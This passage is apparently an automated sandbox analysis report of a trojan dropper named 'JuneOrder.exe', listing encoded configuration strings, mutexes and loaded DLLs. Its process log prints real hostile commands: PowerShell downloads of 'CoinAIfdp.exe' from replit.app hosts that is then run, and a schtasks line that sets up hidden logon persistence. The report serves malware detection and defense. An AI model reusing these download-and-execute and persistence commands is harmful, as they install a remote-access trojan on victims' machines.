'stBMPaCseohw48pQ5j+jieFCpmrBd4rTK1Zvk5A+hcR1EjzVv6UNardciPj5rKcyUb4/Mg+M3Zi+FV09AhSveRMXl0FOwWjKaEbhnFIT60XI6/gG1KTQMr6yZ1QtG4LVe9V3TmczZj7fWN+E6l+Vyc6YdxDOywsTEKqOsPFoPp04HwNes7st3tf4xVlDXrn88XewCZ7LY09n4ht/GObRXgJeK2tKqck6gcn5I/kCw4pZDW4jPQ1XrPwGa4Hi+MIsfi4OrxsPF90qH/QX26+iPizLYAZD0YJDHeaqCxM9yDyMs4/PD+mL6TB3MSgDu5KLuKma+ekkz3HT+bDoa+9UxerSHCSaV6YLOqownJbP+IFURi0CH45wsA/v5fuG44/MeD7F7hwHYHUbVCX1jLUjoumXH4p02ldEL7/A0IF64dCUlm6wXbqAy4m15mg2BYIRfAYKhJlNVaf/MQ/mQW7iPIJGnDtJLFZVDnX6scsLLX2hQXD9AXZuAyF2dws8BkWtTch+YPBkrsaR+OwJzmEGk4FrSMWIZJHAJak4BwGtnwBEzgHeI5R2jQCBhqcF1+ezuNmNmyMiStDD6XW0BOctfbXLo9yQaTIEP74LpzZVZt5gbgoneu7zykSzNrwfSG3NBaoxBAdM1z3UTEBAxaHXHat0wxfL3yqfrjlAWPMfWG0XUOS00xpJPHDhRZYoXa+mH8lUe9FMqFNZzWkwN9ERt5RnBVyoz8Z0d+8Vc0uZoaZ5xdX94ColF0MlIubPRCuvDcAjh6aHb6XzdsYzd8nGgxcOjkdJ0HC/4sN8N9ewcyMeZ4UYXy/8WpbNdYvYPjBMmw73KrtqNmMgXx/Q+W51pkOJnsBCzkqB/JsoTLIO8kkVNXa5h8yc1gCgG/0O6nyMI7pWHxzAkux1tDFNAawVscfIWlj5unqAcGS2XP/yWiGOdJGMxd+A37mJ+kfuQDOzZvnNr8PG3gOGA7EqovErZg==', 'XlJmXPQTjwboANulS9LnwIILBKq/C35BTm8KIAMb8foem7G2GugOGhd3LaKvT4x0FLgzAdHtYEmqWyNHyTJscQ==', 'xgc/DrNayvH+qStYwh5PdHcrFAKMePynDoZI0y1/d9HprMWNE7Dp3Al5+nwN5tcxMmJ1Ywomr6dq+A5l4AZ+NQ==', 'Y7t3wwf932TvdvOqbSa66BoOxuApNMvFkfUnK6B9qryvqz1qRD0TujKRdcA4lL57EUeB63fXrGQvXvnWj2qJFg=='
                Source: 6.2.CoinAIfdp.exe.6040000.3.raw.unpack, Settings.csBase64 encoded string: 'IktYzmeBL3sqI7MbtNwmDlY5Hl5jYuvJ6mqLO5ieg6NR8Rm+Fy2K+UtvY40FJGkFur3tuDEDyY0+2irPMkSsEw==', '/e7N2vcKvkG3uYcb8CLGT7IIcNcNSPNJ854BEG6vRMABRw8TChoVkkF2Yyfa7LaG6pcKLwM4HgnDKwJLD6SdHA==', 'SZ+2mntHgU68CKySNnoNSxuhMBM+7c9KvnWVLuPmt5rHmg9RHTHW8BWoBZuUwkuCyx7Z7KWRwzzcRZ3j1Ek83g==', 'YSiYPcZO8xl1HAUFya3+djvQEXRnwtYCf/DfWtqbNQfNn1ZHqPs9XTOuv533RHNW/hXHUjXtKzr3+9VEenQj+g==', 'NL7ihy/ayhSShDQiRtDG9DQ+MkG4pr72KW4bDzBnZZh/RiVUPqaP9g/f7c52xyVqYdIar4xNoZOTAuCmUoaRu5pHSJyuafxpl49Cj15inc8=', 'stBMPaCseohw48pQ5j+jieFCpmrBd4rTK1Zvk5A+hcR1EjzVv6UNardciPj5rKcyUb4/Mg+M3Zi+FV09AhSveRMXl0FOwWjKaEbhnFIT60XI6/gG1KTQMr6yZ1QtG4LVe9V3TmczZj7fWN+E6l+Vyc6YdxDOywsTEKqOsPFoPp04HwNes7st3tf4xVlDXrn88XewCZ7LY09n4ht/GObRXgJeK2tKqck6gcn5I/kCw4pZDW4jPQ1XrPwGa4Hi+MIsfi4OrxsPF90qH/QX26+iPizLYAZD0YJDHeaqCxM9yDyMs4/PD+mL6TB3MSgDu5KLuKma+ekkz3HT+bDoa+9UxerSHCSaV6YLOqownJbP+IFURi0CH45wsA/v5fuG44/MeD7F7hwHYHUbVCX1jLUjoumXH4p02ldEL7/A0IF64dCUlm6wXbqAy4m15mg2BYIRfAYKhJlNVaf/MQ/mQW7iPIJGnDtJLFZVDnX6scsLLX2hQXD9AXZuAyF2dws8BkWtTch+YPBkrsaR+OwJzmEGk4FrSMWIZJHAJak4BwGtnwBEzgHeI5R2jQCBhqcF1+ezuNmNmyMiStDD6XW0BOctfbXLo9yQaTIEP74LpzZVZt5gbgoneu7zykSzNrwfSG3NBaoxBAdM1z3UTEBAxaHXHat0wxfL3yqfrjlAWPMfWG0XUOS00xpJPHDhRZYoXa+mH8lUe9FMqFNZzWkwN9ERt5RnBVyoz8Z0d+8Vc0uZoaZ5xdX94ColF0MlIubPRCuvDcAjh6aHb6XzdsYzd8nGgxcOjkdJ0HC/4sN8N9ewcyMeZ4UYXy/8WpbNdYvYPjBMmw73KrtqNmMgXx/Q+W51pkOJnsBCzkqB/JsoTLIO8kkVNXa5h8yc1gCgG/0O6nyMI7pWHxzAkux1tDFNAawVscfIWlj5unqAcGS2XP/yWiGOdJGMxd+A37mJ+kfuQDOzZvnNr8PG3gOGA7EqovErZg==', 'XlJmXPQTjwboANulS9LnwIILBKq/C35BTm8KIAMb8foem7G2GugOGhd3LaKvT4x0FLgzAdHtYEmqWyNHyTJscQ==', 'xgc/DrNayvH+qStYwh5PdHcrFAKMePynDoZI0y1/d9HprMWNE7Dp3Al5+nwN5tcxMmJ1Ywomr6dq+A5l4AZ+NQ==', 'Y7t3wwf932TvdvOqbSa66BoOxuApNMvFkfUnK6B9qryvqz1qRD0TujKRdcA4lL57EUeB63fXrGQvXvnWj2qJFg=='
                Source: 6.2.CoinAIfdp.exe.55b128d.2.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 6.2.CoinAIfdp.exe.55b128d.2.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 6.2.CoinAIfdp.exe.2de76a1.0.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 6.2.CoinAIfdp.exe.2de76a1.0.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 6.2.CoinAIfdp.exe.6040000.3.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 6.2.CoinAIfdp.exe.6040000.3.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.evad.winEXE@26/16@3/3
                Source: C:\Users\user\Desktop\JuneOrder.exeCode function: 0_2_004026B8 LoadResource,SizeofResource,FreeResource,0_2_004026B8
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeFile created: C:\Users\user\AppData\Roaming\windowscachergslog.binJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1532:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\svchst.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6852:120:WilError_03
                Source: C:\Users\user\Desktop\JuneOrder.exeFile created: C:\Users\user\AppData\Local\Temp\BC2F.tmpJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\BC2F.tmp\BC30.tmp\BC31.bat C:\Users\user\Desktop\JuneOrder.exe"
                Source: C:\Users\user\Desktop\JuneOrder.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: JuneOrder.exeVirustotal: Detection: 43%
                Source: JuneOrder.exeReversingLabs: Detection: 55%
                Source: unknownProcess created: C:\Users\user\Desktop\JuneOrder.exe "C:\Users\user\Desktop\JuneOrder.exe"
                Source: C:\Users\user\Desktop\JuneOrder.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\BC2F.tmp\BC30.tmp\BC31.bat C:\Users\user\Desktop\JuneOrder.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/CoinAIfdp.exe' -OutFile CoinAIfdp.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe CoinAIfdp.exe
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE1C4.tmp.bat""
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"'
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchst.exe C:\Users\user\AppData\Roaming\svchst.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\svchst.exe "C:\Users\user\AppData\Roaming\svchst.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe "C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchst.exe "C:\Users\user\AppData\Roaming\svchst.exe"
                Source: C:\Users\user\Desktop\JuneOrder.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\BC2F.tmp\BC30.tmp\BC31.bat C:\Users\user\Desktop\JuneOrder.exe"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/CoinAIfdp.exe' -OutFile CoinAIfdp.exe"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe CoinAIfdp.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' & exitJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE1C4.tmp.bat""Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\svchst.exe "C:\Users\user\AppData\Roaming\svchst.exe" Jump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeSection loaded: pcacli.dllJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: urlmon.dllJump to behavior
